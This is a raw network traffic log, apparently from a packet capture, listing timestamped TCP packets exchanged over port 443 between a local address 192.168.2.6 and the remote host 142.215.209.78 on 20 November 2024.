                                                                                                        Nov 20, 2024 20:33:51.339555025 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.339569092 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.343127012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.343141079 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.343187094 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.343194962 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.346246004 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.346278906 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.346309900 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.346316099 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.346354961 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.349535942 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.349601030 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.349606991 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.353562117 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.353621006 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.353632927 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.357167959 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.357224941 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.357233047 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.359993935 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.360055923 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.360064983 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.364077091 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.364140034 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.364146948 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.367288113 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.367347956 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.367357016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.370383024 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.370440960 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.370448112 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.374572992 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.374639988 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.374648094 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.377852917 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.377924919 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.377933025 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.381907940 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.381993055 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.382000923 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.384989023 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.385056019 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.385061979 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.388341904 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.388417006 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.388430119 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.391973019 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.392096996 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.392105103 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.438036919 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.549927950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.549942970 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.550076962 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.550106049 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.553241968 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.553257942 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.553353071 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.553369999 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.556647062 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.556683064 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.556736946 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.556751966 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.556761026 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.560656071 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.560722113 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.560736895 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.563940048 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.564002991 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.564012051 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.566992998 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.567059994 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.567070961 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.571074009 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.571154118 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.571165085 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.574350119 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.574424982 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.574431896 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.577512026 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.577570915 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.577579975 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.581561089 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.581651926 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.581661940 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.584825039 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.584903955 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.584913015 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.588920116 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.588988066 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.588998079 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.592061996 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.592134953 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.592173100 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.595345974 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.595422983 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.595434904 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.599478960 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.599550962 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.599566936 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.603070974 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.603142023 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.603152990 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.656704903 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.762769938 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.762783051 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.762834072 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.762867928 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.762873888 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.766144991 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.766155958 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.766227007 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.766232967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.769407034 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.769452095 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.769474983 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.769480944 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.769503117 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.772478104 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.772571087 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.772578955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.776530981 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.776602983 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.776613951 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.780057907 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.780214071 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.780225039 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.783956051 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.784034967 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.784044981 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.787384033 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.787448883 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.787458897 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.790313959 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.790396929 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.790407896 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.794394970 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.794456959 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.794478893 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.797698975 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.797806978 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.797817945 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.800887108 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.800976992 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.800987005 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.804991961 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.805062056 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.805082083 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.808099985 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.808178902 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.808186054 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.811290979 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.811368942 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.811377048 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.815042973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.815129042 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.815135002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.859848022 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.978163004 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.978178978 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.978281975 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.978298903 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.981302977 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.981311083 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.981360912 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.981372118 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.981401920 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.985394955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.985425949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.985474110 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.985481024 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.985505104 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.988594055 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.988655090 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.988662004 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.991848946 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.991947889 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.991956949 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.995892048 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.995954990 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.995961905 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.999053955 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:51.999159098 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:51.999166965 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.002266884 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.002330065 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.002338886 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.006417036 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.006493092 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.006500959 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.009646893 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.009712934 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.009720087 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.036824942 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.036911011 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.036923885 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.039891958 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.039923906 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.039975882 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.039982080 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.040036917 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.043988943 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.043998957 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.044097900 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.044105053 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.044142962 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.047218084 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.047368050 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.047374010 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.051489115 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.051580906 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.051594973 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.054471016 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.054546118 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.054557085 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.110004902 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.283787012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.283802032 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.283905983 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.283929110 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.286464930 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.286472082 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.286525965 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.286539078 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.289179087 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.289186954 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.289253950 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.289264917 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.291997910 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.292030096 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.292073011 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.292097092 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.292109013 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.295972109 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.296056032 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.296072006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.299206018 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.299302101 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.299318075 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.303035021 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.303106070 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.303114891 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.306247950 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.306329012 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.306338072 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.310353041 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.310605049 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.310617924 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.313918114 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.313986063 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.313997030 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.317212105 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.317292929 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.317302942 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.320389986 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.320494890 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.320507050 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.324095011 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.324147940 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.324162006 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.327756882 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.327950001 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.327965975 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.330591917 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.330646992 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.330658913 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.335722923 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.335793018 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.335803986 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.375439882 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.584517002 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.584531069 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.584649086 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.584666967 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.587632895 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.587668896 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.587701082 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.587709904 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.587727070 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.590977907 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.591064930 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.591075897 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.594983101 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.595057011 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.595072031 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.598297119 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.598419905 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.598433971 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.601449966 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.601521969 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.601536036 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.605541945 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.605607986 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.605618954 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.608824015 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.608892918 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.608905077 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.611902952 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.611998081 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.612013102 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.616029978 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.616087914 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.616095066 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.619309902 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.619755030 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.619764090 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.623569012 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.623646021 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.623655081 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.626844883 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.626930952 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.626940966 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.630340099 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.630417109 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.630426884 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.633713007 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.633872032 CET49734443192.168.2.6142.215.209.78
                                                                                                        Nov 20, 2024 20:33:52.633889914 CET44349734142.215.209.78192.168.2.6
                                                                                                        Nov 20, 2024 20:33:52.636571884 CET44349734142.215.209.78192.168.2.6
